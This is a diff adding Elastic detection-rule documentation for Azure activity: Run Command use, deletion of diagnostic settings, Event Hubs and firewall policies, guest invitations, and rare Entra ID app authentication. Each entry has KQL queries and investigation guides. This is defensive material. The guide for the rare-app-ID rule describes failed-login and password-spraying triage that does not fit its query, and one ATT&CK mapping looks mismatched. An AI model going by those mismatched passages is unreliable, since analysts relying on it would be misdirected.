+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Cloud Administration Command +** ID: T1651 +** Reference URL: https://attack.mitre.org/techniques/T1651/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-diagnostic-settings-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-diagnostic-settings-deletion.asciidoc new file mode 100644 index 0000000000..970bf32489 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-diagnostic-settings-deletion.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-8-azure-diagnostic-settings-deletion]] +=== Azure Diagnostic Settings Deletion + +Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/azure-monitor/platform/diagnostic-settings + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Diagnostic Settings Deletion* + + +Azure Diagnostic Settings are crucial for monitoring and logging platform activities, sending data to various destinations for analysis. Adversaries may delete these settings to hinder detection and analysis of their activities, effectively evading defenses. The detection rule identifies such deletions by monitoring specific Azure activity logs for successful deletion operations, flagging potential defense evasion attempts. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by filtering for the operation name "MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE" and ensuring the event outcome is marked as Success. +- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs. +- Check the timestamp of the deletion event to determine when the diagnostic settings were removed and correlate this with other security events or alerts around the same time. +- Investigate the affected resources by identifying which diagnostic settings were deleted and assess the potential impact on monitoring and logging capabilities. 
+- Review any recent changes or activities performed by the identified user or service principal to determine if there are other suspicious actions that might indicate malicious intent. +- Assess the current security posture by ensuring that diagnostic settings are reconfigured and that logging and monitoring are restored to maintain visibility into platform activities. + + +*False positive analysis* + + +- Routine maintenance activities by authorized personnel may trigger the rule. Ensure that maintenance schedules are documented and align with the detected events. +- Automated scripts or tools used for managing Azure resources might delete diagnostic settings as part of their operation. Review and whitelist these scripts if they are verified as non-threatening. +- Changes in organizational policy or compliance requirements could lead to legitimate deletions. Confirm with relevant teams if such policy changes are in effect. +- Test environments often undergo frequent configuration changes, including the deletion of diagnostic settings. Consider excluding these environments from the rule or adjusting the rule to account for their unique behavior. +- Ensure that any third-party integrations or services with access to Azure resources are reviewed, as they might inadvertently delete diagnostic settings during their operations. + + +*Response and remediation* + + +- Immediately isolate affected Azure resources to prevent further unauthorized changes or deletions. This may involve temporarily restricting access to the affected subscriptions or resource groups. +- Review the Azure activity logs to identify the source of the deletion request, including the user account and IP address involved. This will help determine if the action was authorized or malicious. +- Recreate the deleted diagnostic settings as soon as possible to restore logging and monitoring capabilities. Ensure that logs are being sent to secure and appropriate destinations. +- Conduct a thorough investigation of the user account involved in the deletion. If the account is compromised, reset credentials, and review permissions to ensure they are appropriate and follow the principle of least privilege. +- Escalate the incident to the security operations team for further analysis and to determine if additional resources or expertise are needed to address the threat. +- Implement additional monitoring and alerting for similar deletion activities to ensure rapid detection and response to future attempts. +- Review and update access controls and policies related to diagnostic settings to prevent unauthorized deletions, ensuring that only trusted and necessary personnel have the ability to modify these settings. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
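+
+When validating remediation, it can help to confirm that diagnostic settings were recreated after the deletion. The delete operation name below comes from the rule query; the corresponding write operation name is an assumption made by analogy and may differ in your data, so verify it against your own activity logs before relying on it.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and
+  azure.activitylogs.operation_name:(
+    "MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE" or
+    "MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE"
+  )
+
+----------------------------------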
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE" and event.outcome:(Success or success)
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Impair Defenses
+** ID: T1562
+** Reference URL: https://attack.mitre.org/techniques/T1562/
+* Sub-technique:
+** Name: Disable or Modify Tools
+** ID: T1562.001
+** Reference URL: https://attack.mitre.org/techniques/T1562/001/
+* Sub-technique:
+** Name: Disable or Modify Cloud Logs
+** ID: T1562.008
+** Reference URL: https://attack.mitre.org/techniques/T1562/008/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-entra-id-rare-app-id-for-principal-authentication.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-entra-id-rare-app-id-for-principal-authentication.asciidoc
new file mode 100644
index 0000000000..6d02cadcb5
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-entra-id-rare-app-id-for-principal-authentication.asciidoc
@@ -0,0 +1,169 @@
+[[prebuilt-rule-8-19-8-azure-entra-id-rare-app-id-for-principal-authentication]]
+=== Azure Entra ID Rare App ID for Principal Authentication
+
+Identifies rare Azure Entra ID app IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity.
+
+*Rule type*: new_terms
+
+*Rule indices*:
+
+* filebeat-*
+* logs-azure.signinlogs-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf
+
+*Tags*:
+
+* Domain: Cloud
+* Data Source: Azure
+* Data Source: Entra ID
+* Data Source: Entra ID Sign-in
+* Use Case: Identity and Access Audit
+* Use Case: Threat Detection
+* Tactic: Initial Access
+* Resources: Investigation Guide
+
+*Version*: 4
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Azure Entra ID Rare App ID for Principal Authentication*
+
+
+This rule identifies rare Azure Entra app IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity.
+
+**This is a New Terms rule that focuses on first occurrence of the client `azure.signinlogs.properties.app_id` requesting authentication on-behalf-of the principal user `azure.signinlogs.properties.user_principal_name` in the last 14 days.**
+
+
+*Possible investigation steps*
+
+
+- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process.
+- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt.
+- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks.
+- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password.
+- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account.
+- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources.
+- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration.
+
+
+*False positive analysis*
+
+
+
+*Common benign scenarios*
+
+- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`.
+- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`.
+- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`.
+
+
+*How to reduce false positives*
+
+- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`.
+- Exclude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication.
+- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`.
+- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert.
+
+
+*Response and remediation*
+
+
+
+*Immediate actions*
+
+- Block the source IP address in `source.ip` if determined to be malicious.
+- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies. +- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`. +- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks. +- Review conditional access policies to ensure they are correctly configured to block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. +- Review Conditional Access policies to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. + + +*Long-term mitigation* + +- Implement a zero-trust security model by enforcing least privilege access and continuous authentication. +- Regularly review and update conditional access policies to ensure they are effective against evolving threats. +- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`. +- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks. +- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.signinlogs" and event.category: "authentication" + and azure.signinlogs.properties.is_interactive: false + and azure.signinlogs.properties.user_type: "Member" + and not azure.signinlogs.properties.client_app_used: "Browser" + and not source.as.organization.name: "MICROSOFT-CORP-MSN-AS-BLOCK" + and not azure.signinlogs.properties.app_id: ( + "1b3c667f-cde3-4090-b60b-3d2abd0117f0" or + "26a7ee05-5602-4d76-a7ba-eae8b7b67941" or + "4b0964e4-58f1-47f4-a552-e2e1fc56dcd7" or + "ecd6b820-32c2-49b6-98a6-444530e5a77a" or + "268761a2-03f3-40df-8a8b-c3db24145b6b" or + "fc0f3af4-6835-4174-b806-f7db311fd2f3" or + "de50c81f-5f80-4771-b66b-cebd28ccdfc1" or + "ab9b8c07-8f02-4f72-87fa-80105867a763" or + "6f7e0f60-9401-4f5b-98e2-cf15bd5fd5e3" or + "d7b530a4-7680-4c23-a8bf-c52c121d2e87" or + "52c2e0b5-c7b6-4d11-a89c-21e42bcec444" or + "38aa3b87-a06d-4817-b275-7a316988d93b" or + "27922004-5251-4030-b22d-91ecd9a37ea4" or + "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223" or + "cab96880-db5b-4e15-90a7-f3f1d62ffe39" or + "3a4d129e-7f50-4e0d-a7fd-033add0a29f4" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-authorization-rule-created-or-updated.asciidoc 
b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-authorization-rule-created-or-updated.asciidoc new file mode 100644 index 0000000000..d9df33d4b6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-authorization-rule-created-or-updated.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-19-8-azure-event-hub-authorization-rule-created-or-updated]] +=== Azure Event Hub Authorization Rule Created or Updated + +Identifies when an Event Hub Authorization Rule is created or updated in Azure. An authorization rule is associated with specific rights, and carries a pair of cryptographic keys. When you create an Event Hubs namespace, a policy rule named RootManageSharedAccessKey is created for the namespace. This has manage permissions for the entire namespace and it's recommended that you treat this rule like an administrative root account and don't use it in your application. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/event-hubs/authorize-access-shared-access-signature + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Log Auditing +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Event Hub Authorization Rule Created or Updated* + + +Azure Event Hub Authorization Rules manage access to Event Hubs via cryptographic keys, akin to administrative credentials. Adversaries may exploit these rules to gain unauthorized access or escalate privileges, potentially exfiltrating data. The detection rule monitors for the creation or modification of these rules, flagging successful operations to identify potential misuse or unauthorized changes. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service principal associated with the operation by examining the `azure.activitylogs.operation_name` and `event.outcome` fields. +- Check the timestamp of the event to determine when the authorization rule was created or updated, and correlate this with any other suspicious activities around the same time. +- Investigate the specific Event Hub namespace affected by the rule change to understand its role and importance within the organization. +- Verify if the `RootManageSharedAccessKey` or any other high-privilege authorization rule was involved, as these carry significant risk if misused. +- Assess the necessity and legitimacy of the rule change by contacting the user or team responsible for the Event Hub namespace to confirm if the change was authorized and aligns with operational needs. +- Examine any subsequent access patterns or data transfers from the affected Event Hub to detect potential data exfiltration or misuse following the rule change. 
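+
+To support the pivots above, the following hunting query (not part of the rule) pairs authorization-rule writes with Event Hub deletions, which are covered by a separate rule in this package, so broader tampering in the same namespace and time window stands out. It is a triage aid; scope it to your environment before relying on it.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:("MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/WRITE" or "MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE") and event.outcome:(Success or success)
+----------------------------------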
+ + +*False positive analysis* + + +- Routine administrative updates to authorization rules by IT staff can trigger alerts. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows. +- Automated scripts or deployment tools that update authorization rules as part of regular operations may cause false positives. Identify these scripts and exclude their activity from alerts by filtering based on their service principal or user identity. +- Changes made by trusted third-party services integrated with Azure Event Hub might be flagged. Verify these services and exclude their operations by adding them to an allowlist. +- Frequent updates during development or testing phases can lead to false positives. Consider setting up separate monitoring profiles for development environments to reduce noise. +- Legitimate changes made by users with appropriate permissions might be misinterpreted as threats. Regularly review and update the list of authorized users to ensure only necessary personnel have access, and exclude their actions from alerts. + + +*Response and remediation* + + +- Immediately revoke or rotate the cryptographic keys associated with the affected Event Hub Authorization Rule to prevent unauthorized access. +- Review the Azure Activity Logs to identify any unauthorized access or data exfiltration attempts that may have occurred using the compromised authorization rule. +- Implement conditional access policies to restrict access to Event Hub Authorization Rules based on user roles and network locations. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been compromised. +- Conduct a security review of all Event Hub Authorization Rules to ensure that only necessary permissions are granted and that the RootManageSharedAccessKey is not used in applications. +- Enhance monitoring and alerting for changes to authorization rules by integrating with a Security Information and Event Management (SIEM) system to detect similar threats in the future. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/WRITE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-deletion.asciidoc new file mode 100644 index 0000000000..130577a9b8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-event-hub-deletion.asciidoc @@ -0,0 +1,122 @@ +[[prebuilt-rule-8-19-8-azure-event-hub-deletion]] +=== Azure Event Hub Deletion + +Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about +* https://azure.microsoft.com/en-in/services/event-hubs/ +* https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-features + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Log Auditing +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Event Hub Deletion* + + +Azure Event Hub is a scalable data streaming platform and event ingestion service, crucial for processing large volumes of data in real-time. Adversaries may target Event Hubs to delete them, aiming to disrupt data flow and evade detection by erasing evidence of their activities. The detection rule monitors Azure activity logs for successful deletion operations, flagging potential defense evasion attempts by identifying unauthorized or suspicious deletions. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by checking the operation name "MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE" and ensure the event outcome is marked as Success. 
+- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs. +- Investigate the context of the deletion by reviewing recent activities performed by the identified user or service principal to determine if there are any other suspicious actions. +- Check for any recent changes in permissions or roles assigned to the user or service principal to assess if the deletion was authorized or if there was a potential privilege escalation. +- Correlate the deletion event with other security alerts or incidents in the environment to identify if this action is part of a larger attack pattern or campaign. +- Communicate with relevant stakeholders or teams to verify if the deletion was part of a planned operation or maintenance activity. + + +*False positive analysis* + + +- Routine maintenance or updates by authorized personnel can trigger deletion logs. Verify if the deletion aligns with scheduled maintenance activities and exclude these operations from alerts. +- Automated scripts or tools used for managing Azure resources might delete Event Hubs as part of their normal operation. Identify these scripts and whitelist their activity to prevent false positives. +- Test environments often involve frequent creation and deletion of resources, including Event Hubs. Exclude known test environments from monitoring to reduce noise. +- Changes in organizational policies or restructuring might lead to legitimate deletions. Ensure that such policy-driven deletions are documented and excluded from alerts. +- Misconfigured automation or deployment processes can inadvertently delete Event Hubs. Regularly review and update configurations to ensure they align with intended operations and exclude these from alerts if verified as non-threatening. + + +*Response and remediation* + + +- Immediately isolate the affected Azure Event Hub namespace to prevent further unauthorized deletions or modifications. This can be done by restricting access through Azure Role-Based Access Control (RBAC) and network security groups. +- Review and revoke any suspicious or unauthorized access permissions associated with the deleted Event Hub. Ensure that only authorized personnel have the necessary permissions to manage Event Hubs. +- Restore the deleted Event Hub from backups if available, or reconfigure it to resume normal operations. Verify the integrity and completeness of the restored data. +- Conduct a thorough audit of recent Azure activity logs to identify any other unauthorized actions or anomalies that may indicate further compromise. +- Escalate the incident to the security operations team for a detailed investigation into the root cause and to assess the potential impact on other Azure resources. +- Implement additional monitoring and alerting for Azure Event Hub operations to detect and respond to similar unauthorized activities promptly. +- Review and update security policies and access controls for Azure resources to prevent recurrence, ensuring adherence to the principle of least privilege. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
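+
+Because diagnostic settings frequently stream platform logs to Event Hubs, an actor silencing telemetry may remove both. The following hunting query, which is illustrative rather than part of the rule, combines this rule's operation with the diagnostic settings deletion operation covered earlier in this package.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:("MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE" or "MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE") and event.outcome:(Success or success)
+----------------------------------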
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE" and event.outcome:(Success or success)
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Impair Defenses
+** ID: T1562
+** Reference URL: https://attack.mitre.org/techniques/T1562/
+* Sub-technique:
+** Name: Disable or Modify Cloud Logs
+** ID: T1562.008
+** Reference URL: https://attack.mitre.org/techniques/T1562/008/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-external-guest-user-invitation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-external-guest-user-invitation.asciidoc
new file mode 100644
index 0000000000..c83deafd01
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-external-guest-user-invitation.asciidoc
@@ -0,0 +1,124 @@
+[[prebuilt-rule-8-19-8-azure-external-guest-user-invitation]]
+=== Azure External Guest User Invitation
+
+Identifies an invitation to an external user in Azure Active Directory (AD). Azure AD is extended to include collaboration, allowing you to invite people from outside your organization to be guest users in your cloud account. Unless there is a business need to provision guest access, it is best practice to avoid creating guest users. Guest users could potentially be overlooked indefinitely, leading to a potential vulnerability.
+
+*Rule type*: query
+
+*Rule indices*:
+
+* logs-azure.auditlogs-*
+* filebeat-*
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://docs.microsoft.com/en-us/azure/governance/policy/samples/cis-azure-1-1-0
+
+*Tags*:
+
+* Domain: Cloud
+* Data Source: Azure
+* Use Case: Identity and Access Audit
+* Tactic: Initial Access
+* Resources: Investigation Guide
+
+*Version*: 106
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating Azure External Guest User Invitation*
+
+
+Azure Active Directory (AD) facilitates collaboration by allowing external users to be invited as guest users, enhancing flexibility in cloud environments. However, adversaries may exploit this feature to gain unauthorized access, posing security risks. The detection rule monitors audit logs for successful external user invitations, flagging potential misuse by identifying unusual or unnecessary guest account creations.
+
+
+*Possible investigation steps*
+
+
+- Review the audit logs to confirm the details of the invitation event, focusing on the operation name "Invite external user" and ensuring the event outcome is marked as Success.
+- Identify the inviter by examining the properties of the audit log entry, such as the initiator's user ID or email, to determine if the invitation was expected or authorized. +- Check the display name and other attributes of the invited guest user to assess if they align with known business needs or if they appear suspicious or unnecessary. +- Investigate the inviter's recent activity in Azure AD to identify any unusual patterns or deviations from their typical behavior that might indicate compromised credentials. +- Consult with relevant business units or stakeholders to verify if there was a legitimate business requirement for the guest user invitation and if it aligns with current projects or collaborations. +- Review the access permissions granted to the guest user to ensure they are limited to the minimum necessary for their role and do not expose sensitive resources. + + +*False positive analysis* + + +- Invitations for legitimate business partners or vendors may trigger alerts. Regularly review and whitelist known partners to prevent unnecessary alerts. +- Internal users with dual roles or responsibilities that require external access might be flagged. Maintain a list of such users and update it periodically to exclude them from alerts. +- Automated systems or applications that require guest access for integration purposes can cause false positives. Identify these systems and configure exceptions in the monitoring rules. +- Temporary projects or collaborations often involve inviting external users. Document these projects and set expiration dates for guest access to minimize false positives. +- Frequent invitations from specific departments, such as HR or Marketing, for events or collaborations can be common. Establish a process to verify and approve these invitations to reduce false alerts. + + +*Response and remediation* + + +- Immediately disable the guest user account identified in the alert to prevent any unauthorized access or activities. +- Review the audit logs to determine the source and context of the invitation, identifying the user or system that initiated the guest invitation. +- Notify the security team and relevant stakeholders about the unauthorized guest invitation for further investigation and potential escalation. +- Conduct a security assessment of the affected Azure AD environment to identify any other unauthorized guest accounts or suspicious activities. +- Implement conditional access policies to restrict guest user invitations to authorized personnel only, reducing the risk of future unauthorized invitations. +- Enhance monitoring and alerting for guest user invitations by integrating with a Security Information and Event Management (SIEM) system to ensure timely detection and response. +- Review and update the organization's Azure AD guest user policies to ensure they align with security best practices and business needs, minimizing unnecessary guest access. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
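+
+When tuning this rule, it can help to baseline overall invitation activity first. The query below loosens the rule query by removing the guest display-name and outcome filters so that all invitation attempts, including failures, are visible; it is a hunting aid only and is expected to be noisier than the rule itself.
+
+[source, js]
+----------------------------------
+event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Invite external user"
+----------------------------------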
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Invite external user" and azure.auditlogs.properties.target_resources.*.display_name:guest and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-firewall-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-firewall-policy-deletion.asciidoc new file mode 100644 index 0000000000..109eb45767 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-firewall-policy-deletion.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-azure-firewall-policy-deletion]] +=== Azure Firewall Policy Deletion + +Identifies the deletion of a firewall policy in Azure. An adversary may delete a firewall policy in an attempt to evade defenses and/or to eliminate barriers to their objective. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* 